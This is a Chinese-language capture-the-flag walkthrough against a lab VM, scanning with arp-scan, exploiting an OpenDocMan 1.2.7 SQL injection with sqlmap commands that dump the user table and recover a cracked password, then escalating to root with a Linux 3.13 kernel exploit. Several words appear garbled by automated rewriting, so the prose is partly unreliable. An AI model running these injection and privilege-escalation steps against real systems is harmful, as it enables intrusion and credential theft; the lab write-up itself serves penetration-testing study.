开启虚拟机,利用arp-scan扫描得到目标ip的地址。
root@kali:~# arp-scan 192.168.56.0/24
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
192.168.56.10a:00:27:00:00:0d(Unknown)
192.168.56.10008:00:27:1d:d9:73CADMUS COMPUTER SYSTEMS
192.168.56.10408:00:27:7c:ac:b1CADMUS COMPUTER SYSTEMS
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.277 seconds (112.43 hosts/sec). 3 responded
得到目标192.168.56.104。然后利用nmap扫描开开放的端口。
从扫描的结果来看,开放22、80端口。访问80端口,创造是一个网站。
随便翻翻目录创造没有什么可疑的东西。后看看网页源代码。我以为玩ctf便是要看看源代码,有时候会有出乎猜想的创造。
有个提示的目录,/jabcd0cs/ ,访问这个目录。创造是个openDocMan CMS。也可以利用鼠标选中之后才会涌现隐蔽的文本。
0x02漏洞创造
访问的后台登录界面。看看创造居然有版本号V1.2.7。可以推断得到OpenDocMan是一个cms。
然后看看有没有OpenDocMan的漏洞,百度一搜,果真有个OpenDocMan版本为1.2.7的SQL注入漏洞。
0x03漏洞利用既然存在sql注入那么就利用大神器Sqlmap。这里我碰着一个坑,便是直策应用sqlmap加存在sql注入地址的网址。结果sqlmap居然煞笔了,不认识存在SQL注入。末了在存在SQL注入的网站后添加—level=2,sqlmap才跑出SQL注入。网上说填加—level=2 sqlmap就会对cookie等参数进行测试。
看看命令:
sqlmap -u \"大众http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user\"大众 -p add_value --level=2
sqlmap -u \公众http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user\"大众 -p add_value --level=2 -D jabcd0cs -T odm_user –dump
得到用户名:Webmin ,密码:b78aae356709f8c31118ea613980954b。SOMD5还是依旧的强大。得到密码明文:webmin1980.
0x04攻陷主机
居然只是普通用户权限。没有查看root目录的权限。那么我们就来提权试试。
内核版本3.13.0-24
searchsploit linux 3.13,搜索版本号为3.13的exp。Searchsploit是exploit-db的搜索程序,没有的可以下载试试。
一样平常大略的exploit-db的exp都有利用方法。看看代码就知道如何利用。上传exp。
gcc 37292.c -o ofs
./ofs
然后查看权限。OK顺利提权。
大家理理思路。渗透测试重点的便是思路,思路精确,做渗透一点也不难。
